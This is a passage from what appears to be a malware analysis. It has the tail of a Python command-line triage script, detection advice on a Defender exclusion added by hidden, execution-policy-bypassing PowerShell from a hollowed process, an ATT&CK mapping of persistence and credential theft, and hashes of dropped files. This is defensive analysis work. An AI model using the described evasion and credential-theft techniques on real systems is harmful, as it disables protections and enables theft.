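    return sorted({tech for cmd in cmdlines for _, tech in triage(cmd)})


if __name__ == "__main__":
    for cmd in CMDLINES:
        hits = triage(cmd)
        print(("FLAG " if hits else "     ") + cmd[:70], [n for n, _ in hits])
    print("ATT&CK:", technique_coverage(CMDLINES))
```

Two things worth noting when turning this into production detections. The exclusion rule should fire on the parent as well: here the Add-MpPreference call is spawned by the hollowed 360_.exe/ef12ce34.exe copy, so parent image plus `-W Hidden -Exec Bypass` is a far stronger signal than the cmdlet alone. On a live host, `(Get-MpPreference).ExclusionPath` shows whether the exclusion actually landed, and Defender records the preference change as Event ID 5007 in the Microsoft-Windows-Windows Defender/Operational log.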
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
Credential Access
- Credentials from Password Stores (1)
  - Credentials from Web Browsers (1)
- Unsecured Credentials (3)
  - Credentials In Files (2)
  - Credentials in Registry (1)
Downloads
-
Filesize
1KB
MD5 baf55b95da4a601229647f25dad12878
SHA1 abc16954ebfd213733c4493fc1910164d825cac8
SHA256 ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924
SHA512 24f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545
-
Filesize
1KB
MD5 4280e36a29fa31c01e4d8b2ba726a0d8
SHA1 c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256 e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4
-
Filesize
18KB
MD5 ecaeae6e34ade14e56fdfffd5daf8bb7
SHA1 6086dfcabef4901482894baf06e6f11b5586abdc
SHA256 e110b441429821f04e146df36629730c7abf2f970d9f62022610af8b32e541c3
SHA512 6daf86020893e7a328ea9ddfc7a1f4ec26cdb8e427c835b2563e4422a5f753143e50638a7f6703472d9ae18606eb5b2e43a7e26ec52b9322935ace557cebc7e4
-
Filesize
18KB
MD5 ee392093f22078e83341de3ff684ed41
SHA1 69b9df1a5493684ac4207e61cd436440a4db10bc
SHA256 4840ff78dea7308d934e1191e962590f1caa0d666a611430d2d24a36aef55488
SHA512 6d0f0376d7b6870f6c391c415ed0f6f409285bf68b5090edb0cf1f4f0a51e75859be22c4d5dc73a6f82a0ed55393f69833d6cc947f9017aef57d22f34f3de06b
-
Filesize
284KB
MD5 95d5aa97a3c15cee24aad800cc169d2b
SHA1 2ace4e384316f6aba1a77fbea5a30d73259760d6
SHA256 1a56132c232842530d78edb6d0ce387b98995e2912df0075d74db9b2f9aa3770
SHA512 5e024d56d44f1de22e201bc91d4a125bc1d3a6f0ef005d6213a5256decd1ff52a8abb77f2fbaa8304dcdeb21e4f4ed4bd0008858e6a2ab5a04943985ab02ddbe
-
Filesize
1.1MB
MD5 1a2b16c17517d602806431c0744f5f8f
SHA1 465e2d6bd37972295cd017f78f35faa07102ab4e
SHA256 d52c40b759d5c215ab4090e972038dd6bdcad31c56d72d9a25ed6e76f3f952f1
SHA512 a5bf48dcdc3bde33d919f5e65c183d5fb12cb671497d990dcce38f353bf6546aa0dd4d258e6c7e5b735a47c532a405eeecb78d146afce4382c5e72b2ccffc4bd
-
Filesize
309KB
MD5 757123039fc621efee71d41b044d14c5
SHA1 d3b5b88f7d5aeddf4994a90b5d888677c31d72b9
SHA256 afcaa62dd1e4dddd03a67db6175f406742c7c759b2f919e20a142d8b89554064
SHA512 5d910968da586bce3b3ba35727492abcc928abe016265aa17b366b1e4f4c5c1f814f44612595abdfdae2e9a87524e4085aa0151adcdee72f95fc41642beaf4b1
-
Filesize
3.1MB
MD5 01cb0e497f40e7d02f93255475f175e1
SHA1 98c779497d6514b91cd1410f627a5320f6b3eab5
SHA256 15893230cadb8c8fba530903bc2a7e5cb4da78c00d40ea9473963455978c0f95
SHA512 fc81504089f520935d95e98ea867faf3dcc44b2399c418fea95f193c45584d72730868ce4362beef4adc5f9a89c008da1fc7a529a35a6cc7803d0ca15f386ef9
-
Filesize
200KB
MD5 5d026af9171c4bcec7b38ff42b1fb266
SHA1 e97563e92862f5284352147ba3de4fca45e11f81
SHA256 052cee21bf536d51bcaf66edc262a1c391dea5a941cda58b83bf1eea43037169
SHA512 c5fbb96bfb4e9de7ac71ce9595678e9e724a9728bb26085f2e411d29638ffb2e74e3106375a5251b96d01f2007752559a042b22ce4594bda8a0982c588c288ce
-
Filesize
31KB
MD5 63f444ed65088c9e278ec2e6892899a6
SHA1 588c5ca8e39578b9341f7cbaa7bec05af51566c4
SHA256 6cb9455b415038c5fe7e6d86677f3751033b0478f7264a171cc7a277ad3b706c
SHA512 1859caf0ba1c328142c8910f4504aea0096d55dac286809ae161c827558f60875f76d5840e469644092ecd05891de5da7ef0f492f50f47d8279dd86704a69567
-
Filesize
1.5MB
MD5 2d1c174ac5d4a6df46585926e49bbd73
SHA1 9fa4fb19a3859a391618ff909c1f0362af579d5d
SHA256 3e4df98402da35b9ea2ef9b488b63c8b7bc536b75dd164fd88b50163751bc47c
SHA512 484b7e78a843dd66d7945fab7b14e4163f6af06c766508dc744b77984a4cdb14a1290d953915d4d8f3a32acf108583e2991dd90aa503c8fa6dc72115dbed056a
-
Filesize
111KB
MD5 c27417453090d3cf9a3884b503d22c49
SHA1 17938ece6999bc94d651743063c3f989e38547b4
SHA256 d330b3cec745ce7bf9856e3cdce277a52fe7ad09874d519fa7b9b080a61a7407
SHA512 27d115974702510f9ef7eb841d359764197429ed9d233f98facec317fdaa8b4ec4e481103d8b950ee2f10711280e7296457107d928603af2174b586233abb443
-
Filesize
278KB
MD5 92ae7a1286d992e104c0072f639941f7
SHA1 d2c0fe4e7e9df1b4a9a4cd69e3167003e51c73b2
SHA256 1771c4e6e34fda6a68c7b1d980cc3dffbe587c651f985bf7235c6af9a8904fd3
SHA512 bed93d1e09f576c52b231046cbf9a4ef81ebb2f68eaa6fc7b0eea889418e5f3af440fef5da55882b5535f26d994fdd34c288ba62e7fb033f5bd372cf752bb62b
-
Filesize
108KB
MD5 6c1bcf0b1297689c8c4c12cc70996a75
SHA1 9d99a2446aa54f00af0b049f54afa52617a6a473
SHA256 40dc213fe4551740e12cac575a9880753a9dacd510533f31bd7f635e743a7605
SHA512 7edf53adf8db463658aa4a966cf9e22bf28583cb0ca4317af19e90d85232b6cb627e810033155383948d36ad6a1a14f32b3381d10c7cd6c4bd0482c974c129db
-
Filesize
898KB
MD5 4c3049f8e220c2264692cb192b741a30
SHA1 46c735f574daaa3e6605ef4c54c8189f5722ff2a
SHA256 7f74b2c86e9f5706fc44c8d5093a027d1cd5856006aa80f270efae26d55c9131
SHA512 b13dc855c3c06b56aa9bf181680b69003839adeaf16c5372912004a7bf42882e340c445c58e24e083692b4dcbb15c3e0cf244664458ccdd0dd7668b440277e0a
-
Filesize
392KB
MD5 a896758e32aa41a6b5f04ed92fe87a6c
SHA1 e44b9c7bfd9bab712984c887913a01fbddf86933
SHA256 7664288e924fecf085d750dbd40c405bd0dbc9d1ed662c5ecf79c636976e867c
SHA512 e6ca9818c394fd3cbbb4f21141c40d5cab3c16a82c96435ea1133eabbb44cc954d022dc6cbd13200d08d5ce8d905c3b933b3edf52eeacca858dfd3d6a3866021
-
Filesize
37B
MD5 28151380c82f5de81c1323171201e013
SHA1 ae515d813ba2b17c8c5ebdae196663dc81c26d3c
SHA256 bb8582ce28db923f243c8d7a3f2eccb0ed25930f5b5c94133af8eefb57a8231d
SHA512 46b29cba0dc813de0c58d2d83dc298fa677921fd1f19f41e2ed3c7909c497fab2236d10a9ae59b3f38e49cf167964ede45e15543673a1e0843266242b8e26253
-
Filesize
453KB
MD5 fb30b403c1fa1d57fb65dc8b8e00e75c
SHA1 161cf9d271aee2d7d2f7a0a5d0001830929c300b
SHA256 83d9579e6b71561a9dafbdd309b4dbfaddf816c7ccc25e4672c8d9dfb14b6673
SHA512 d0d15e51527bcfad38c01c46b4c43257407ead9c328bc4d48d21c9702c16872e52509e014444e78cd22f1ad96c11a88d281c2a745df0a4ca21243352f879de85
-
Filesize
16KB
MD5 e7d405eec8052898f4d2b0440a6b72c9
SHA1 58cf7bfcec81faf744682f9479b905feed8e6e68
SHA256 b63a0e5f93b26ad0eeb9efba66691f3b7e7f51e93a2f0098bde43833f7a24cc2
SHA512 324507084bd56f7102459efe7b3c2d2560f4e89ed03ec4a38539ebb71bccdf1def7bc961c259f9b02f4b2be0d5e095136c9efcd5fc3108af3dc61d24970d6121
-
Filesize
60B
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
6KB
MD5 293165db1e46070410b4209519e67494
SHA1 777b96a4f74b6c34d43a4e7c7e656757d1c97f01
SHA256 49b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a
SHA512 97012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19
-
Filesize
234B
MD5 0a9ff4b4aa9f6d7876621d3fb22ea32f
SHA1 e4ff35a2bfd97e1fc32a472ccaa80adba359e6c9
SHA256 278daab702df8efb208d043a22f8016096ebebc9359d2dd92efa21e29ac3f978
SHA512 6a36495079da0b663b475379784af60afe60a65208086fb640f2870aac08fa8be919d0374b24aa3e9c93d630127e3449a53e444b45cfa67dbcb2792911b1bb18
-
Filesize
28B
MD5 816ed385c1604f9b08773ea1397c9080
SHA1 c8c1da0c4c8f266d6cb38f06b20de6f3c89c52de
SHA256 0df4177eb40b163a3ede52cc20f59921a2a35bca6b4eb4194bcf5a6c6d38a94c
SHA512 ebef216d7f43fa36c839cd19475e7cfaf453be9c2ab5e4ecc2ed2f56e1d63469ef1556e39bf0b756f7c5e757139e8b0e50ea5bd362a3477b0e9375832a31ce8e
-
Filesize
204B
MD5 9db591218ed1a50771c7dc7f0e8511e8
SHA1 11892f9ece85f7f10efcc561945f4379b0061943
SHA256 a99b8c2e6a91764f630ae6783c02119dd1631864a24e6751a068488b19a59116
SHA512 0eebd9fe2b9a305511f430a500f5e568b5073b6fc0924f0a75e3a2d1601ed2b6b2d5cb32f56e6b006280507940b876dca4c78827afb81396b6e6c5f15d7880e1